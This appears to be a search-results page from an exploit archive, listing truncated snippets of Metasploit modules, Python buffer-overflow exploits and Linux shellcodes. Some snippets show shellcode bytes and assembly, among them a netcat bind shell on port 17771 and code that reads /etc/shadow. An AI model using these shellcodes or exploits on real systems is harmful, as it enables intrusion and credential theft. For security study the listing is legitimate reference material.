7261 matches found
Airties login-cgi Buffer Overflow Exploit
Exploit for hardware platform in category remote exploits This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core' class Metasploit3 'Airties login-cgi Buffer Overflow', 'Description' = %q This module exploit...
IBM Security AppScan Standard 9.0.2 - OLE Automation Array Remote Code Execution
!/usr/bin/python import BaseHTTPServer, socket IBM Security AppScan Standard OLE Automation Array Remote Code Execution Author: Naser Farhadi Linkedin: http://ir.linkedin.com/pub/naser-farhadi/85/b3b/909 Date: 1 June 2015 Version: function runmumaa On Error Resume Next set shell=createobject"Shel...
Airties login-cgi Buffer Overflow
This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core' class Metasploit3 'Airties login-cgi Buffer Overflow', 'Description' = %q This module exploits a remote buffer overflow vulnerability on several Airtie...
The Windows kernel attack-vulnerability warning-the black bar safety net
This article summarizes the current windows kernel attacks of various attack techniques. Describes and demonstrates some of the common bypass windows kernel protection method, and a reverse three describes how to pass kernel defects found in similar bypass method. By the kernel attack and memory...
linux/x86 execve "/bin/sh" shellcode - 26 bytes
/ ; Title: Linux/x86 execve "/bin/sh" - shellcode 26 bytes ; Platform: linux/x8664 ; Date: 2015-05-19 ; Author: Reza Behzadpour ; Simple ShellCode section .text global start start: xor ecx,ecx mul ecx ;execve"/bin/sh", NULL, NULL mov al,11 jmp shell shellret: pop ebx push ecx push ebx pop ebx int...
Linux/x86 - execve "/bin/sh" - shellcode 26 bytes
Linux/x86 - execve "/bin/sh" - shellcode 26 bytes. Shellcode exploit for linx86 platform / ; Title: Linux/x86 execve "/bin/sh" - shellcode 26 bytes ; Platform: linux/x8664 ; Date: 2015-05-19 ; Author: Reza Behzadpour ; Simple ShellCode section .text global start start: xor ecx,ecx mul ecx...
Windows 8.0 - 8.1 x64 TrackPopupMenu Privilege Escalation (MS14-058) Exploit
Microsoft Windows versions 8.0 and 8.1 on x64 TrackPopupMenu privilege escalation exploit that leverages the vulnerability documented in MS14-058 Windows 8.0 - 8.1 x64 TrackPopupMenu Privilege Escalation MS14-058 CVE-2014-4113 Privilege Escalation from ctypes import from ctypes.wintypes import...
linux/x86 - exit(0) - 6 bytes
/ linux/x86 exit0 - 6 bytes Febriyanto Nugroho / include char shellcode = "\xf7\xf0" "\xcd\x80" "\xeb\xfa"; int mainint argc, char argv asm"jmp %0;" : "=m" shellcode;...
linux/x86-64 - Execve /bin/sh Shellcode Via Push - 23 bytes
/ Execve /bin/sh Shellcode Via Push Linux x8664 23 bytes Dying to be the shortest. Copyright C 2015 Gu Zhengxiong email protected 27 April 2015 GPL .global start start: char const argv xorl %esi, %esi 'h' 's' '/' '/' 'n' 'i' 'b' '/' movq $0x68732f2f6e69622f, %rbx for '\x00' pushq %rsi pushq %rbx...
linux/x86 - /bin/nc -le /bin/sh -vp 17771 Shellcode - 58 Bytes
/ Linux x86 /bin/nc -le /bin/sh -vp 17771 shellcode This shellcode will listen on port 17771 and give you /bin/sh Shellcode Author: Oleg Boytsev Tested on: Debian GNU/Linux 7/i686 Shellcode Length: 58 Command: gcc -m32 -z execstack x86Linuxnetcatshellcode.c -o x86Linuxnetcatshellcode global start...
Linux/x86 execve "/bin/sh" - shellcode - 35 bytes
/ ; Title: Linux/x86 execve "/bin/sh" - shellcode 35 bytes ; Platform: linux/x8664 ; Date: 2014-06-26 ; Author: Mohammad Reza Espargham ; Simple ShellCode section .text: 08048060 : 8048060: eb 17 jmp 8048079 08048062 : 8048062: 5e pop %esi 8048063: 31 d2 xor %edx,%edx 8048065: 52 push %edx 804806...
Disable ASLR in Linux - 84 bytes
/ Title: Disable ASLR in Linux less byte and more compact Length: 84 bytes Date: 3 April 2015 Author: Mohammad Reza Ramezani email protected - g+ Tested On: kali-linux-1.0.6-i386 Thanks to stackoverflow section .text global start start: jmp short fileaddress shellcode: pop ebx xor eax,eax mov byt...
linux/x86 - Execve /bin/sh Shellcode Via Push - 21 bytes
/ Execve /bin/sh Shellcode Via Push Linux x86 21 bytes Dying to be the shortest. Copyright C 2015 Gu Zhengxiong email protected 18 February 2015 GPL .global start start: char const argv xorl %ecx, %ecx 2 bytes, and both %eax and %edx were zeroed mull %ecx NRexecve 11 movb $11, %al for '\x00' push...
BisonWare FTP Server 3.5 Buffer Overflow Exploit
BisonWare FTP Server version 3.5 buffer overflow proof of concept exploit for Windows XP SP3. !/usr/bin/python Exploit Title: BisonWare FTP Server Version 3.5 Egg Hunting Exploits Date: 22 April,2015 Exploit Author: Bikash Dash www.vulnerableghost.com Version: BisonWare FTP Server Version 3.5...
i.FTP 2.21 - Time Field (SEH)
!/usr/bin/python Exploit Title : i.FTP 2.21 Time Field SEH Exploit Exploit Author : Revin Hadi S Vulnerability PoC : Avinash Kumar Thapa "-Acid" PoC Link : https://www.exploit-db.com/exploits/36847/ Date : 05/08/2015 Vendor : http://www.memecode.com/iftp.php Software Link :...
Mediacoder 0.8.34.5716 - (.m3u) Buffer Overflow SEH Exploit
Exploit for windows platform in category local exploits !/usr/bin/python Exploit Title: Mediacoder 0.8.34.5716 Buffer Overflow SEH Exploit .m3u Date: 05/May/2015 Author: @evilcomrade IRC freenode: vulnhub or offsec or corelan email: kwiha2003 at yahoo dot com=20 Version: 0.8.34.5716 Tested on: Wi...
Mediacoder 0.8.34.5716 - .m3u Local Buffer Overflow (SEH)
Mediacoder 0.8.34.5716 - .m3u Local Buffer Overflow SEH !/usr/bin/python Exploit Title: Mediacoder 0.8.34.5716 Buffer Overflow SEH Exploit .m3u Date: 05/May/2015 Author: @evilcomrade IRC freenode: vulnhub or offsec or corelan email: kwiha2003 at yahoo dot com Version: 0.8.34.5716 Tested on: Win X...
Linux x86 - /bin/nc -le /bin/sh -vp 17771 Shellcode 58 Bytes
Linux x86 - /bin/nc -le /bin/sh -vp 17771 Shellcode 58 Bytes. Shellcode exploit for linx86 platform / Linux x86 /bin/nc -le /bin/sh -vp 17771 shellcode This shellcode will listen on port 17771 and give you /bin/sh Shellcode Author: Oleg Boytsev Tested on: Debian GNU/Linux 7/i686 Shellcode Length:...
Mediacoder 0.8.34.5716 Buffer Overflow
!/usr/bin/python Exploit Title: Mediacoder 0.8.34.5716 Buffer Overflow SEH Exploit .m3u Date: 05/May/2015 Author: @evilcomrade IRC freenode: vulnhub or offsec or corelan email: kwiha2003 at yahoo dot com Version: 0.8.34.5716 Tested on: Win XP3 Vendor: http://www.mediacoderhq.com/ Software link:...
linux/x86 setuid(0) + setgid(0) + execve("/bin/cat", "/etc//shadow") - 52 by
// linux/x86 setuid0 + setgid0 + execve"/bin/cat", "/etc//shadow" - 52 bytes // Febriyanto Nugroho include char shellcode = "\x6a\x17\x58\xcd\x80\x6a\x2e" "\x58\xcd\x80\x6a\x0b\x58\x99" "\x52\x68\x61\x64\x6f\x77\x68" "\x2f\x2f\x73\x68\x68\x2f\x65" "\x74\x63\x89\xe1\x52\x68\x2f"...